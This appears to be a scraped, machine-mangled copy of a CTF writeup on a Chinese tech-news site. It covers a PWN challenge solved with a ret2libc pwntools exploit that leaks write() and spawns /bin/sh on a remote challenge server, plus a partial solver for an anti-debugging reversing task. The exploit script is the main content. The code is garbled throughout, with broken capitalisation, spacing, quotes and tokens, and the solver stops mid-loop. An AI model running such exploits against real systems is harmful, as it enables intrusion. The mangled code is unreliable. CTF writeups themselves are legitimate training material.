How to analyze the writeup of CTF 01/19 Update SLTechnology News&Howtos

How to analyze the writeup of CTF

2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

This article will explain in detail the writeup of several CTF questions for you. The content of the article is of high quality, so the editor shares it for you as a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

This is a relatively simple PWN question, first drag to the IDA to have a brief look at the program, as shown in the figure

It is found that there is no stack protection when reading, so when read0x34, it is possible to replace game to return the address, first through write (1 game write 4) (game as the return address of write). The write address is read out so that you can get the system address, because it runs in a loop, and / bin/sh\ 0 is also written in 0x804A06C so that system can run.

Pythonexp is as follows:

Frompwn import *

DefrungameAgainPoc (pplace yourame.fame flag):

P.recvuntil ("First,what's your name?\ n")

P.send (yourname+ "\ n")

P.recvuntil ("doyou want to get flag?\ n")

P.send (flag)

Pwnelf= ELF (". / pwn")

Libcelf= ELF (". / libc-2.23.so")

Gameadd= 0x080485CB

Plt_write= pwnelf.symbols ['write']

Got_write= pwnelf.got ['write']

# p = process ('. / pwn',env= {'LD_PRELOAD':'./libc-2.23.so'})

P = remote ('117.50.60.184, 12345)

RungameAgainPoc (p, "ichuqiu", "0" * 32 + p32 (plt_write) +

P32 (gameadd) + p32 (1) + p32 (got_write) + p32 (4))

Write_addr= U32 (p.recv (4))

Print "pwn write", hex (write_addr)

Libcelf_system_add= libcelf.symbols ["system"] +

Write_addr- libcelf.symbols ["write"]

Print "pwn libcelf_system_add", hex (libcelf_system_add)

RungameAgainPoc (p, "/ bin/sh\ 0", "0" * 32 +)

P32 (libcelf_system_add) + p32 (gameadd) + p32 (0x804A06C))

P.interactive ()

Flag {62c51c85-1516-4ad8-989c-58ce8c29642e}

0x02 Antidbg

IDA looks for key functions and finds a circular comparison

Preliminary judgment, it is an 8-digit number, so compare it separately.

# [ebp+var_6C] 01050D02070106010206000B07010C06

# [ebp+var_4C] 02080602

# [ebp+var_5C] 0100070D020108080D000103040D0303

# [ebp+var_48] 02050009

# [ebp+var_44] 00000D02

Defcover (buf):

Buf= buf.decode ("hex")

Rbuf= ""

Fori in range (len (buf)-1):

Rbuf+= buf [i]

Returnrbuf

Defcover_hex_lines (buf):

Returnbuf.replace (","). Replace ("\ r", "). Replace ("\ n ","). Decode ("hex")

Var_6c=cover ("01050D02070106010206000B07010C06")

+ cover ("0100070D020108080D000103040D0303")

+ cover ("02080602") + cover ("02050009")

+ cover ("00000D02")

# printlen (var_6c)

Byte_402178= "" 02 02 02 03 01 01 02

0101 02 0101 00 0101 02 02 00 0101 0101 00

0101 02 02 00 0101 02 02 0101 0101 01 02 01

0103 00 00 00

0303 0D 04 03 01 00 0D 08 08 01 02 0D 07 00 01

060C 01 07 0B 00 06 02 01 06 01 07 02 0D 05 01

0000 0000 EF 28 68 5B 0000 0000 02 0000 00

4800 00 00 E4 22 00 00 E4 16 00 00 00

EF28 68 5B 00 00 00 0C 00 00 00 14 00 00 00

2C23 00 00 2C 17 00 00 00 EF 28 68 5B

0000 0000 0D 0000 00 54 02 0000 40 23 0000

4017 00 00 00 EF 28 68 5B 00 00 00

0E00 00 00 00

A000 00 00 00

0000 0000 0000

0000 0000 0000 00 30 40 00

E022 40 00 01 00 00 00 E8 20 40 00 00 00

0000 0000 0000 00 01 0000 0000 0000

0000 0000 0000

0000 0000 0000 ""

.replace (",") .replace ("\ r", ") .replace ("\ n ",") .decode ("hex")

Byte_402138= "" 00 00 00 01 00 00 00

0200 00 00 03 00 00 00 04 00 00 00 05 00 00 00

0600 00 00 07 00 00 00 08 00 00 00 09 00 00 00

0A00 00 00 0B 00 00 00 0C 00 00 00 0D 00 00 00

0E00 00 00 0F 00 00 ""

.replace (",") .replace ("\ r", ") .replace ("\ n ",") .decode ("hex")

Dword_403018= "" 0200 00 00 0200 00 00

0200 00 00 0200 00 00 00

"" .replace (",") .replace ("\ r", ") .replace ("\ n ",") .decode ("hex")

# text:0040110E mov ecx, [ebp+var_4]

# .text: 00401111 xor ecx, ebp

# .text: 00401113 mov dword_40301C, 3

# .text: 0040111D mov dword_403020, 6

# .text: 00401127 mov dword_403024, 7

# the memory value has changed, so modify it

Dword_403018= dword_403018 [0:4] +'\ x03' + dword_403018 [5:8]

+'\ x06' + dword_403018 [9:12] +'\ x07'

+ dword_403018 [13:]

Printdword_403018.encode ("hex")

Fori in range (0Pol 42):

Hightnum= ord (dword_403018 [ord (byte_402178 [I]) * 4])

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.